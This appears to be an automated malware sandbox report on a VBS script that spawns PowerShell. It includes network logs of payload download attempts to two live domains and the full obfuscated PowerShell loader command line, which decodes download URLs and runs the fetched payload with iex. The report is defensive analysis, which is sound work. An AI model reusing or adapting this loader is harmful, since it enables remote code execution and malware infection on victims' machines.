                                                    Host: www.erp-royal-crown.info
                                                    Connection: Keep-Alive
                                                    2024-12-05 09:45:23 UTC238INHTTP/1.1 404 Not Found
                                                    Connection: close
                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                    pragma: no-cache
                                                    content-type: text/html
                                                    content-length: 1251
                                                    date: Thu, 05 Dec 2024 09:45:23 GMT
                                                    server: LiteSpeed
                                                    2024-12-05 09:45:23 UTC1130INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                    2024-12-05 09:45:23 UTC121INData Raw: 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 69 74 65 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                    Data Ascii: Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    17192.168.2.549924184.171.244.2314433504C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-12-05 09:45:28 UTC89OUTGET /wh/Subordinerendes78.smi HTTP/1.1
                                                    Host: www.almrwad.com
                                                    Connection: Keep-Alive
                                                    2024-12-05 09:45:29 UTC164INHTTP/1.1 404 Not Found
                                                    Date: Thu, 05 Dec 2024 09:45:29 GMT
                                                    Server: Apache
                                                    Content-Length: 315
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    2024-12-05 09:45:29 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    18192.168.2.549939148.251.114.2334433504C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-12-05 09:45:34 UTC98OUTGET /wh/Subordinerendes78.smi HTTP/1.1
                                                    Host: www.erp-royal-crown.info
                                                    Connection: Keep-Alive
                                                    2024-12-05 09:45:35 UTC238INHTTP/1.1 404 Not Found
                                                    Connection: close
                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                    pragma: no-cache
                                                    content-type: text/html
                                                    content-length: 1251
                                                    date: Thu, 05 Dec 2024 09:45:35 GMT
                                                    server: LiteSpeed
                                                    2024-12-05 09:45:35 UTC1130INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                    2024-12-05 09:45:35 UTC121INData Raw: 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 69 74 65 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                    Data Ascii: Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    19192.168.2.549951184.171.244.2314433504C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-12-05 09:45:40 UTC89OUTGET /wh/Subordinerendes78.smi HTTP/1.1
                                                    Host: www.almrwad.com
                                                    Connection: Keep-Alive
                                                    2024-12-05 09:45:41 UTC164INHTTP/1.1 404 Not Found
                                                    Date: Thu, 05 Dec 2024 09:45:40 GMT
                                                    Server: Apache
                                                    Content-Length: 315
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    2024-12-05 09:45:41 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    20192.168.2.549967148.251.114.2334433504C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-12-05 09:45:46 UTC98OUTGET /wh/Subordinerendes78.smi HTTP/1.1
                                                    Host: www.erp-royal-crown.info
                                                    Connection: Keep-Alive
                                                    2024-12-05 09:45:47 UTC238INHTTP/1.1 404 Not Found
                                                    Connection: close
                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                    pragma: no-cache
                                                    content-type: text/html
                                                    content-length: 1251
                                                    date: Thu, 05 Dec 2024 09:45:46 GMT
                                                    server: LiteSpeed
                                                    2024-12-05 09:45:47 UTC1130INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                    2024-12-05 09:45:47 UTC121INData Raw: 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 69 74 65 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                    Data Ascii: Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    21192.168.2.549982184.171.244.2314433504C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-12-05 09:45:52 UTC89OUTGET /wh/Subordinerendes78.smi HTTP/1.1
                                                    Host: www.almrwad.com
                                                    Connection: Keep-Alive
                                                    2024-12-05 09:45:52 UTC164INHTTP/1.1 404 Not Found
                                                    Date: Thu, 05 Dec 2024 09:45:52 GMT
                                                    Server: Apache
                                                    Content-Length: 315
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    2024-12-05 09:45:52 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                    Statistics

                                                    CPU Usage

                                                    Click to jump to process

                                                    Memory Usage

                                                    Click to jump to process

                                                    High Level Behavior Distribution

                                                    Click to dive into process behavior distribution

                                                    Behavior

                                                    Click to jump to process

                                                    System Behavior

                                                    General

                                                    Target ID:0
                                                    Start time:04:43:43
                                                    Start date:05/12/2024
                                                    Path:C:\Windows\System32\wscript.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\script.vbs"
                                                    Imagebase:0x7ff615120000
                                                    File size:170'496 bytes
                                                    MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:1
                                                    Start time:04:43:43
                                                    Start date:05/12/2024
                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter';If (${host}.CurrentCulture) {$Bellisserne++;}Function gaardspladsens($Agerendes){$Dafter135=$Agerendes.Length-$Bellisserne;$Unburden='SUBsTRI';$Unburden+='ng';For( $Unminimizing=5;$Unminimizing -lt $Dafter135;$Unminimizing+=6){$Anetholes+=$Agerendes.$Unburden.Invoke( $Unminimizing, $Bellisserne);}$Anetholes;}function sanktionjtr($Epigyne){ . ($Emanciperingerne) ($Epigyne);}$Forlngelsers=gaardspladsens 'Ol erMTyvekoDi.elzCoenoi Fronl Heldl.nfusaNatro/E.cam5Unbri.Avlsh0Koord Fo.b(Po.omW AcceiFravrnAmentd UnpuoRealkw ZoonsMyxom .ejsN .hudTRecor Unend1Turne0,npow.Zymoc0Dacty;Predo F,skeWantipiSeptinGu,gn6Kundg4Brn,b;Colla Overixforsy6Af ta4 Malt;Fo.ew LawserPrepov Kom,:Barnl1for e2Incom1Tom,t.te,eo0Alloc)B.ytk Vill,G Skyte Retrc kldnk MaveoChili/L.tre2Redis0Nazil1Tling0C rci0Zitta1Trkas0Nonco1 Slu SelecFM.ssaiSkyd rSi ine ampf .ostochevixDemob/trodd1und.r2Ser m1Earmu.Stra,0Exagg ';$Fangstknivens=gaardspladsens 'ImparUPremosaromaeBallar Unfr-Lect,APliengRipo,e ExcenRubritDefin ';$Unyttigst=gaardspladsens 'Afvrgh DanstAllestH.stepKommesbevi,: K.nt/Dosme/ forgwIter.wPal mwNeur..HouslaVagarlC ccymKlovnr HemawAnnelaSkjerd.ndta. SvrvcUnkinoSultampimps/,tammwparanh Skva/Sp.ckSUnin,uLo hibOrgieoStorkrSamtadOptrniTap.lnResuneCommerPaxone,hapenGowlkdPingeeRokkes,usti7Affld8Unem..,eadmsUnharmde eniV,nre>MicrohForlotSteretKniplpKonklsTillg:Lingu/Rengr/ Dimyw SusiwBreg.w,onst. Samle DomsrGgepupArgui-appelrn,rmaoOpryky Ethea AkkrlGarvk-Protoc kandrNo.atoFe tswfejlmnMesop. DecaiEmbaln irkefResteoAnh l/ CifrwChanchAttak/,adioS Alaru.ountbIndlsoParaprpian.d Scrai ThornS.ptieFin.irK ntaeChantnVegetd FingeI,glosGuden7 Bekr8abrik.,ydrosKri sm lddeiM.tte ';$Deaktiverende=gaardspladsens 'panor> atol ';$Emanciperingerne=gaardspladsens 'Bru.hiBlideeRut,exFyl e ';$Almengjordes='Loftrum243';$Cometlike = gaardspladsens ' H lvequ,drcRespohsura,oSniff Teser%Subcha Klunpkun.tptaagedFlotaaCr.sst TvanaCox c%D.mss\AurunS nforuSkrmscSv jncAiz,eeGreensAnthof FjeruDisjolVeksedLitogeBlod.. Sub,bCentrlTeksto olle Lati&Ultra&Tamar SandieOphthct ndah C.gaoAfplu FamiltSlidb ';sanktionjtr (gaardspladsens 'Isos.$ImpregArri.lTombaoRossabGast aSo,thlPrede:.eserUHanged DisksautoomSbeopeKontolWretctIncrenBerigiMenzinO,eirgDed gePurifn Ho o=W ter( Gam,cReto.m excadEloin Unch/ Ami cAllit Rekvi$OboleC StavoSuppemSevereUnmantThromlOghamiCes,ok RekoeUdmaa) exp, ');sanktionjtr (gaardspladsens 'Nouve$FrankgA.romlE,ponoThirdbVar,eaC eckl Angi:FurfuPFolliaBj.rgr BrneaSy pllMgli a ugerlD,nceiNonteaClosk=.epid$SkovgU DyslnGasliyMelaetsnesetDubbaiT,dtag Ov.rsIm.untAgrar. RejosP cnopKnaldlUdstriEnalitusik,( Comb$AfblnDA.iseePer,gaquiltkBountt.arnaighanevIntuieFremfr Impie Hu.gnUheldd LufteAto a) Sile ');sanktionjtr (gaardspladsens 'Ty,hl[Re.roNGa.teeAnskutNedsa.LilleS Forde Ind rMechovHistriBronzcUdvinejalo,PQualio wi niT ksan Tr.mtTra.iMToldva U.henDe phaSpansgHybrieDecarrBottl]Inder:Mi.un:UntraSst vse B,gvcInd auGietirLselyikva,ttLout.yTamanPArgierFjo.toAnmartIntero LigncUnsweo He slFgte Sigh.=Profe Sexga[R.klaNGged eBuddhtCyclo. SpheSsto.leRetaxcBijouuMessirRugnii,lidft KalvyKo mePPligtrHurraoChar tPaintoH.drac SelmoAur.clpulicTBa.isyRetropSkulle Be r]Multi:im.fs:Lsel Tta celmobilsNodia1 ejs2Chart ');$Unyttigst=$Paralalia[0];$Sportshelt= (gaardspladsens 'Urinv$ ,onog Di,ul.osanoNondibvrts,aDaughlOrtho:Ek alHGoa taHirude m.ldmFraukoUnintpContar inteotomogtDereieArbeju UdensLeu.o5Una.a3Snown=scopiNLiskae Undewbalda- .limOIntimbH enejF,ktoeJack.c Ps ctSpini Lab,SFa.veyLodsns.peletSaurueFejl.mKr kk.Scal NB.screHoftetFlers.Prin,WLiti,e uwarbv,ndiCUpbuilUnsigiBel ne Causn akset');$Sportshelt+=$Udsmeltningen[1];sanktionjtr ($Sportshelt);sanktionjtr (gaardspladsens ' alvf$P.risHLaerea,raineEskadm Foreoco,iop FortrNynazo Misdt Hexye PhotuKahausFl.ve5Ne.ro3dixli.SabbaH sveseF,revaLiljedIndspe P adrFuglesPreim[Gsac $Mas.iFSkovta Paasn PoolgAntifsK,pittTili,k Panin,iheni MetavLqwbee Gir,nTri.isExend]Overa= Fisk$EretrFSkviso Fla rEnsemlElaf nConteg SkrueAirstl ErfasTypeaeUnderr O.hasPlayb ');$Frstepladserne=gaardspladsens 'Upres$trideHRe veaPhysieStannmMinstoNondupIlma rmuseto Damptpr.geeImidouBommesHuman5No,ex3Uaktu. CyniDInklioTranswSigisnSm.rtlBeclooSemica Vindd Uno.FUp,igi Bilil KataeP,ash(Til a$SpdbrURestin,enziyAst ot rndstlkkeriKalkbgUncoms D.satA,lur, Selv$ArbitSStrafv .jereLuskejPochosCawineAuspirTypehePs.ud)Mm.rl ';$Svejsere=$Udsmeltningen[0];sanktionjtr (gaardspladsens 'Stand$,ytotgVarkal Tr,aoBoxlibCebriaBehanlMobil:wormsRAmm,nePunits Isdee Heiim Ste,bM.cerlGrentaAcetab askl FiceeCo.on=Recon(hofmaT,ndreeStu fsElekttpickp- ButtPUnempaFunktt Adr hdegra B nkr$Barn.STt.ekvThyroeCout.j SarasTibbie S ndrUdsp.ePrimu)Vasif ');while (!$Resemblable) {sanktionjtr (gaardspladsens 'Mango$ IliogArb jlCombpo Gipsbfi keaB,litl and:BacciU InornMazareUfat lDramaa Ulf.bDampso tormrAktena Acidt Bokoe S.nslMalocyvelli=Fa gl$BlacktPennyr Brumu.akfjeH pog ') ;sanktionjtr $Frstepladserne;sanktionjtr (gaardspladsens ' Ga,eSAnoretSmasha,ildvr,oncetForci-StillSLinjelformue Moboe Skrap Skif aller4Nicke ');sanktionjtr (gaardspladsens ' Grap$Falkegm,ctulAppelo AnlgbForstaTory,l Tine:ElectR Slideamatrs Dre e SvavmDelinblivsrlSatyraThomibUdskilCocree wird=adapi(ReamuTKseb.eUnives A,detGhett-GhettP OrgaaPa.hytWasseh Amat .eolp$veterSIndvivAm,uleTra.sjM sstsDuffieO nirr rgfoe Forb)Outa. ') ;sanktionjtr (gaardspladsens 'Lgter$IndopgAimlelro tio CorcbOuts.aT.glvlArrhy:PulchVOlie,eHomeonFre.sufo,gasA cohhIntera.upidaMonarrMaske= Uhde$GriflgSvinal,eekeo FilmbOchera D.lelagfas: epokKMa mil Loudoallots emoneArriltSkidtt handeUfordrVulgan UnrueTakhas Coff+Newfa+qu,ry%Spise$KitteP AfplaAstigrEarboaPersplFa ilaExsanl Srvei U staPorta.TangecCompoo Mlkeu,olban overt Blod ') ;$Unyttigst=$Paralalia[$Venushaar];}$Relationsnavne=334162;$Fraflytter=29582;sanktionjtr (gaardspladsens 'Falu $ crosgSerielUnfenoRefrib ElspaMelanlFrame:P,votNGonotoAnsjons ptldDiseqiC pyrsS.lfus riftiSc,urpTekstaSlikmt Aa,eeLykkedRubrilAf,ejytrilr besky=Spiru .etskG SynseMaskit Subs-materCHustao.defonAnsvatMil.beSkuern B.rgtAppea Ploug$SemaeSSuspevM dlaePassejSprins Rac,ePlonkrAdmiteSound ');sanktionjtr (gaardspladsens 'Inapp$Marsigblon lAr,tho SkolbBedstaOp uslCoccy:OvergSSkorzuFireap GlazeOpmunrDal,ts Wiene .nrec No.crFl.mme rudttOmk aiP,admo OvarnScree Udvi=St,an V st[amen SStammyGenres KvabtAmo,peS.rafmSmitt.Un,ipCRespioFi,tnnPr grv Poc eG,naerSamdetcoope]hinde:Kompr:KrykhFGlendrPolyeoB.tonmVed,rBGersoaAnacas StineNon.e6 Tidl4RivalS isket.atchr bsiti rikenaltrigGenae(Co.ka$IncitNMisimothu,nnHaanddH.vegiUnr.vsSandbsWomaniKosyspProteaMaskit re.reVal,dd HulklHo,edyFet,r)Svov. ');sanktionjtr (gaardspladsens 'Ka.kv$Ko,plg ,adelLimi.oCa cibUgenna UmenlLithi: BourAMetacrSekune Gurso Ha,dg Sup rD.staaSubsipOp.rvhpik,me oldorkonom Monst=Garni Scabr[D bleSUdtynyTapiosA.hudtBekose.edemmMarti.DibleTNeur,e S,gexSubautmorp .SkrifEDe epn SkadcMicrooPar gdF,gseiProdunBlomsgRecom]Milor:Ypsil:AngloANo.anSexarcCDriftI Ey pICadis.UnmilG acaneGuldstMurexSm rgitEft rrUdatei An inAttaigIsole(Uds.r$InterSIndisu.rtmapU,chaeTriazrTlpersFrstee Laerc oplr ObpyeNegrotUnc,nixenoloPlintnNonid)W nds ');sanktionjtr (gaardspladsens 'Bedre$Shan g misbl ingeoVestubKoorda Pettl.bebo: Nystn Quira ntipcikorh HalltB,conh MelaeProvenBoff.iRea dcAgate=deskt$ Kil,A EfterHool.e MechoAr ejgChastrHylstaUnnotpTurrihForudeA,rsdrNatur. SlhusBoissuou,lib,ventsDo.umtUnebrrGledeiFldstnHortegSvige(Lgdom$FodboRCam teForlol AnveaFoldetA.onyiCon,eoCo panTvrersPolitnSkspoa Th,uvRelegn Smele To k,Phase$EjendF kl,arServiaAllitf AfmulTyre.yAntiotOcta.tHonnreDigenrKaard)Petro ');sanktionjtr $naphthenic;"
                                                    Imagebase:0x7ff7be880000
                                                    File size:452'608 bytes
                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:false

                                                    General

                                                    Target ID:2
                                                    Start time:04:43:43
                                                    Start date:05/12/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff6d64d0000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:false

                                                    General

                                                    Target ID:4
                                                    Start time:04:43:46
                                                    Start date:05/12/2024
                                                    Path:C:\Windows\System32\cmd.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Succesfulde.blo && echo t"
                                                    Imagebase:0x7ff71cb50000
                                                    File size:289'792 bytes
                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Disassembly

                                                    Reset < >

                                                      Executed Functions

                                                      Function 00007FF848F56A1B Relevance: 1.4, Strings: 1, Instructions: 171COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.3372692187.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7ff848f50000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (I
                                                      • API String ID: 0-2813301079
                                                      • Opcode ID: 13cdd56c77ae7c5f27542bc77321f210b8cf9232ea423e2b65fbe24a21717b9f
                                                      • Instruction ID: a512ca7c8e0aa256367d79878669df3af6b1f8fc2a479489aa2c71e57d43ab81
                                                      • Opcode Fuzzy Hash: 13cdd56c77ae7c5f27542bc77321f210b8cf9232ea423e2b65fbe24a21717b9f
                                                      • Instruction Fuzzy Hash: 0951B1A2D0E7C66FE353A7781825265BFE4EF53695F0940FBD0998B0D3EA0C180AC356
                                                      Function 00007FF848F56609 Relevance: .5, Instructions: 465COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.3372692187.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7ff848f50000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d8ccaf96c76daa9ed55a9d7cffb65cbc5c4348cd78240040ea9b8d53719fda57
                                                      • Instruction ID: d403f0598cc147c69f1be3a4198e8aee5f0451f05063440303acecc1f2cd7bc0
                                                      • Opcode Fuzzy Hash: d8ccaf96c76daa9ed55a9d7cffb65cbc5c4348cd78240040ea9b8d53719fda57
